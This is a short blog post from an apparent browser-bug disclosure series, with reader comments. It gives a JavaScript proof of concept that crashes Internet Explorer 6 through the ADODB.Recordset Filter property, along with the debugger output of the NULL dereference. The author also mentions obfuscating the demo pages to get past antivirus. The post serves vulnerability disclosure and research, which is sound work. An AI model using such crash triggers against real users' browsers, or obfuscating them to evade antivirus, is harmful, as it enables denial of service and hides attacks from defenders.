MoBB #1: ADODB.Recordset Filter Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.
a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }
Demonstration
eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference.
posted by hdm @ 8:47 AM
6 comments
links to this post
6 Comments:
IE 7 beta 3 still crashes, but first you´ll have to accept the activeX
With IE6 SP2 you have to click in order to download the activex. So it's not dangerous.
I disagree with your "you have to click" ... "So it's not dangerous.", comment. If someone puts any thought at all into Social Engineering regarding this or any exploit then it can be dangerous. Disregarding something because you have to click on something else is exactly the problem. Think before you click...
Clicked on the "Demonstration" link here. Trend immediately quarantined HTML_IECRASHC.C even before loading the "real" demo page.
Looks like Trend is adding AV sigs for each of these - kind of pointless, considering how easy it is to obfuscate evil javascript. The relevant link is:
HTML_IECRASH.C
If the AVs start getting annoying, I will auto-obfuscate the Demonstration pages on the backend. Thanks for the heads up.
This bug affects both IE6 and IE7.
Post a Comment
Links to this post:
Create a Link
<< Home